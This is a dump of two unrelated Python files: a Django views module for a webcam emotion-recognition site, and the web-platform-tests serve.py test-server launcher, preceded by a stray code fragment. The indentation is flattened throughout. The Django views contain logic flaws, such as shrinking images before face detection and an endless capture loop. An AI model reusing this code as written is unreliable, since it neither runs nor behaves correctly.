return appointment_data
|
views.py
|
# Django related libs
from django.shortcuts import render
from django.http import StreamingHttpResponse
from django.core.files.base import ContentFile
from django.core.files import File
#libraries existing in the project
from .models import Image
from .forms import ImageForm, TempForm
from backend.settings import BASE_DIR
# Standard Libraries
import os
import threading
import io
# 3rd Party Libraries
import cv2
import PIL
import numpy as np
import tensorflow as tf
from tensorflow.keras.models import load_model
#Constants
IMG_SIZE = 48
EMOTIONS = ["afraid", "angry", "disgust", "happy", "neutral", "sad", "surprised"]
HF = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
#Views
def home(request):
'''
Home view manages the first page of the website
'''
return render(request, 'index.html', {})
def predict(request):
'''
The Heart of the project,
From here the user will be able to ask for recommendation
'''
return render(request, 'predict.html', {})
def prepare(img):
SIZE = 48 # image size
img_array = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img_array=img_array/255.0
new_array = cv2.resize(img_array, (SIZE, SIZE)) # resize image to match model's expected sizing
return new_array.reshape(-1,SIZE, SIZE,1)
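# Illustrative shape note: prepare() turns a BGR face crop into a single
# grayscale 48x48 sample scaled to [0, 1], reshaped to (1, 48, 48, 1) -- the
# (batch, height, width, channels) layout the Keras model expects.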
def predict_image(image_array, category, name_image):
try:
print('Inside predict_image shape: {}'.format(image_array.shape))
gray = cv2.cvtColor(image_array, cv2.COLOR_BGR2GRAY)
img = image_array.copy()
faces = HF.detectMultiScale(gray, 1.3, 8)
try:
faces = sorted(faces, reverse=True, key = lambda x: (x[2]-x[0]) *(x[3]-x[1]))[0]
(x,y,w,h)=faces
img = cv2.rectangle(img,(x,y),(x+w,y+h),(220,40,50),2)
roi = img[y:y+h, x:x+w]
model_path = os.path.join(BASE_DIR, '6/')
model=load_model(model_path, compile=False)
print('Image shape is {}'.format(img.shape))
prediction = model.predict([prepare(roi)])
preds = prediction[0]
label = EMOTIONS[preds.argmax()]
cv2.rectangle(img,(x,y+h+10),(x+w,y+h+70),(220,40,50),-2)
cv2.putText(img,label, (x+10, y+h+50), cv2.FONT_HERSHEY_SIMPLEX, 1.3, (225, 225, 225), 3)
        except Exception:
            # Fall back to a default label so the return below does not raise NameError
            # when no face is detected or prediction fails.
            label = 'unknown'
            print("Something happened during prediction")
_, buffer_img = cv2.imencode('.jpeg', img)
f_img = buffer_img.tobytes()
f1 = ContentFile(f_img)
image_file = File(f1, name=name_image)
return image_file, label
except Exception as e:
print(e)
def form_view(request):
flag = 0
context_dict = {}
upload_image = Image()
modified_image = Image()
temp_form = TempForm({'recommend': 'no'})
image_form = ImageForm()
if request.method=="POST":
temp_form = TempForm(request.POST)
t_value=request.POST.get('recommend')
if t_value == 'yes':
print("YEs it is happening")
img_obj = Image.objects.filter().order_by('-id')[0]
print("image object = {}".format(img_obj))
print("image object image = {}".format(img_obj.uploads))
category = img_obj.category
name_image = img_obj.uploads.name
print(name_image)
print(type(img_obj))
print('retrieved')
test_image = img_obj.uploads
            image_bytes = test_image.read()
target_image = PIL.Image.open(io.BytesIO(image_bytes))
target_image = target_image.resize((IMG_SIZE, IMG_SIZE), PIL.Image.ANTIALIAS)
print(type(target_image))
image_array = np.array(target_image)
image_file, x1 = predict_image(image_array, category, name_image)
print('Image_file type: {}'.format(type(image_file)))
modified_image.uploads = img_obj.uploads
print("next step")
modified_image.save()
context_dict = {'form': image_form, 'temp_form': temp_form, 'prediction': x1, 'image_show': modified_image}
else:
image_form = ImageForm(request.POST, request.FILES)
if image_form.is_valid():
print('inside form.valid function')
category = image_form.cleaned_data['category']
if request.FILES.get("uploads", None) is not None:
print("image prese")
test_image = request.FILES["uploads"]
image_byte = test_image.read()
target_image = PIL.Image.open(io.BytesIO(image_byte))
name_image = image_form.cleaned_data['uploads'].name
flag = 1
if 'uploads' in request.FILES:
print('inside function')
upload_image.category = image_form.cleaned_data['category']
upload_image.uploads = request.FILES['uploads']
upload_image.save()
print('Saved image -> {}'.format(upload_image.uploads.name))
upload_obj = Image.objects.filter().order_by('-id')[0]
image_id = upload_obj.id
print("Upload obj is {} ".format(upload_obj))
print("image id = {}".format(image_id))
print("Image show is {} and type is {} and URL is {} ".format(upload_image.uploads, type(upload_image), upload_image.uploads.url))
context_dict = {'form': image_form, 'temp_form': temp_form, 'image_show': upload_image }
else:
print("These are image errors")
print(image_form.errors)
else:
image_form = ImageForm()
context_dict = {'form': image_form, 'temp_form': temp_form}
print(context_dict)
print("This is the last step")
print("Context dict is {}".format(context_dict))
return render(request, 'statRes.html', context=context_dict)
def capture_from_cam():
cap = cv2.VideoCapture(0)
currentFrame = 0
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
currentFrame += 1
print("The function is over")
class VideoCapture(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
        (self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
def __del__(self):
self.video.release()
def get_frame(self):
image = self.frame
ret, jpeg = cv2.imencode('.jpg', image )
return jpeg.tobytes()
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
#cam = VideoCapture()
def gen(camera):
while True:
        frame = camera.get_frame()
yield(b'--frame \r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
# I am following code from here https://stackoverflow.com/questions/49680152/opencv-live-stream-from-camera-in-django-webpage
# to implement a webcam
def livefe(request):
try:
        # Stream MJPEG frames from the webcam using the gen() generator defined above.
        return StreamingHttpResponse(gen(VideoCapture()),
                                     content_type='multipart/x-mixed-replace; boundary=frame')
    except Exception:
        print("Error occurred")
|
serve.py
|
import abc
import argparse
import importlib
import json
import logging
import multiprocessing
import os
import platform
import subprocess
import sys
import threading
import time
import traceback
import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from typing import ClassVar, List, Set, Tuple
from localpaths import repo_root # type: ignore
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants # type: ignore
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
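# For example, replace_end("foo.any.worker.html", ".any.worker.html", ".any.js")
# returns "foo.any.js"; the assert guards against a suffix that does not actually
# terminate the string.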
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
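# For example, domains_are_distinct("www.web-platform.test", "web-platform.test")
# is False because one is a subdomain of the other, while
# domains_are_distinct("a.example", "b.example") is True.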
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = [] # type: ClassVar[List[Tuple[str, str]]]
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
headers = self.headers + handlers.load_headers(
request, self._get_filesystem_path(request))
for header_name, header_value in headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
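    # Illustrative mapping, using the WorkersHandler path_replace entries defined
    # further down: for a request path "/x/y.any.worker.html", resource_path=True
    # yields "/x/y.any.worker.js" (what the wrapper loads), while
    # resource_path=False yields "/x/y.any.js" (the file on disk).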
def _get_filesystem_path(self, request):
"""Get the path of the underlying resource file on disk."""
return self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_filesystem_path(request)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
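    # The metadata parsed here comes from lines at the top of the associated .js
    # file such as:
    #     // META: timeout=long
    #     // META: script=/common/get-host-info.sub.js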
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None # type: ClassVar[str]
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WorkerModulesHandler(HtmlWrapperHandler):
global_type = "dedicatedworker-module"
path_replace = [(".any.worker-module.html", ".any.js", ".any.worker-module.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s", { type: "module" }));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class SharedWorkerModulesHandler(HtmlWrapperHandler):
global_type = "sharedworker-module"
path_replace = [(".any.sharedworker-module.html", ".any.js", ".any.worker-module.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s", { type: "module" }));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class ServiceWorkerModulesHandler(HtmlWrapperHandler):
global_type = "serviceworker-module"
path_replace = [(".any.serviceworker-module.html",
".any.js", ".any.worker-module.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register(
"%(path)s%(query)s",
{ scope, type: 'module' },
);
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class BaseWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
def _meta_replacement(self, key, value):
return None
@abc.abstractmethod
def _create_script_import(self, attribute):
# Take attribute (a string URL to a JS script) and return JS source to import the script
# into the worker.
pass
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return self._create_script_import(attribute)
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
class ClassicWorkerHandler(BaseWorkerHandler):
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _create_script_import(self, attribute):
return 'importScripts("%s")' % attribute
class ModuleWorkerHandler(BaseWorkerHandler):
path_replace = [(".any.worker-module.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
import "/resources/testharness.js";
%(script)s
import "%(path)s";
done();
"""
def _create_script_import(self, attribute):
return 'import "%s";' % attribute
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
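    # For example, if "/" is registered first and "/custom/" is added afterwards,
    # reversed() puts the "/custom/" routes ahead of the "/" routes, so the more
    # specific mount point wins for requests under /custom/.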
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.worker-module.html", WorkerModulesHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.sharedworker-module.html", SharedWorkerModulesHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.serviceworker-module.html", ServiceWorkerModulesHandler),
("GET", "*.any.worker.js", ClassicWorkerHandler),
("GET", "*.any.worker-module.js", ModuleWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(logger, aliases, config):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
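# Illustrative sketch (not part of the original module): the aliases consumed
# by get_route_builder are plain dicts with "url-path" and "local-dir" keys.
# A trailing "/" on the url-path yields a directory mount point, anything else
# a single-file mount; the paths below are assumptions for the example only.
_EXAMPLE_ALIASES = [
    {"url-path": "/custom/", "local-dir": "/tmp/custom-tests"},
    {"url-path": "/robots.txt", "local-dir": "/tmp/static/robots.txt"},
]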
class ServerProc(object):
def __init__(self, mp_context, scheme=None):
self.proc = None
self.daemon = None
self.mp_context = mp_context
self.stop_flag = mp_context.Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, log_handlers, **kwargs):
self.proc = self.mp_context.Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config, log_handlers),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, log_handlers, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
importlib.reload(logging)
logger = get_logger(config.log_level, log_handlers)
if sys.platform == "darwin":
# on Darwin, NOFILE starts with a very low limit (256), so bump it up a little
# by way of comparison, Debian starts with a limit of 1024, Windows 512
import resource # local, as it only exists on Unix-like systems
maxfilesperproc = int(subprocess.check_output(
["sysctl", "-n", "kern.maxfilesperproc"]
).strip())
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
# 2048 is somewhat arbitrary, but gives us some headroom for wptrunner --parallel
# note that it's expected that 2048 will be the min here
new_soft = min(2048, maxfilesperproc, hard)
if soft < new_soft:
resource.setrlimit(resource.RLIMIT_NOFILE, (new_soft, hard))
try:
self.daemon = init_func(logger, host, port, paths, routes, bind_address, config, **kwargs)
except OSError:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start()
try:
self.stop_flag.wait()
except KeyboardInterrupt:
pass
finally:
self.daemon.stop()
except Exception:
logger.critical(traceback.format_exc())
raise
def stop(self, timeout=None):
self.stop_flag.set()
self.proc.join(timeout)
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(logger, config, routes, mp_context, log_handlers):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc(mp_context)
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config, log_handlers)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.stop()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
    # Windows interprets the IP address 0.0.0.0 as non-existent, making it an
    # appropriate alias for non-existent hosts. However, UNIX-like systems
    # interpret the same address to mean any IP address, which is inappropriate
    # for this context. These systems do not reserve any value for this
    # purpose, so the unavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(logger, host, ports, paths, routes, bind_address, config,
mp_context, log_handlers, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2, "https": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires OpenSSL 1.0.2+')
continue
        # Skip the WebTransport over HTTP/3 server unless it is enabled explicitly.
if scheme == 'webtransport-h3' and not kwargs.get("webtransport_h3"):
continue
for port in ports:
if port is None:
continue
init_func = {
"http": start_http_server,
"http-private": start_http_server,
"http-public": start_http_server,
"https": start_https_server,
"https-private": start_https_server,
"https-public": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"webtransport-h3": start_webtransport_h3_server,
}[scheme]
server_proc = ServerProc(mp_context, scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, log_handlers, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(logger):
logger.critical(EDIT_HOSTS_HELP)
sys.exit(1)
def start_http_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed(logger)
def start_https_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed(logger)
def start_http2_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
ws_doc_root=paths["ws_doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed(logger)
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
logger = logging.getLogger()
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
logger.critical("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self):
self.started = True
self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True  # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(logger)
def start_wss_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(logger)
def start_webtransport_h3_server(logger, host, port, paths, routes, bind_address, config, **kwargs):
try:
# TODO(bashi): Move the following import to the beginning of this file
# once WebTransportH3Server is enabled by default.
from webtransport.h3.webtransport_h3_server import WebTransportH3Server # type: ignore
return WebTransportH3Server(host=host,
port=port,
doc_root=paths["doc_root"],
cert_path=config.ssl_config["cert_path"],
key_path=config.ssl_config["key_path"],
logger=logger)
except Exception as error:
logger.critical(
"Failed to start WebTransport over HTTP/3 server: {}".format(error))
        sys.exit(1)
def start(logger, config, routes, mp_context, log_handlers, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(logger, host, ports, paths, routes, bind_address, config, mp_context,
log_handlers, **kwargs)
return servers
def iter_servers(servers):
    for server_list in servers.values():
        for port, server in server_list:
yield server
def _make_subdomains_product(s: Set[str], depth: int = 2) -> Set[str]:
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit: int) -> Set[str]:
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"http-private": ["auto"],
"http-public": ["auto"],
"https": [8443, 8444],
"https-private": ["auto"],
"https-public": ["auto"],
"ws": ["auto"],
"wss": ["auto"],
"webtransport-h3": ["auto"],
},
"check_subdomains": True,
"log_level": "info",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, logger, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
logger,
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def build_config(logger, override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls(logger)
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
if kwargs.get("verbose"):
rv.log_level = "debug"
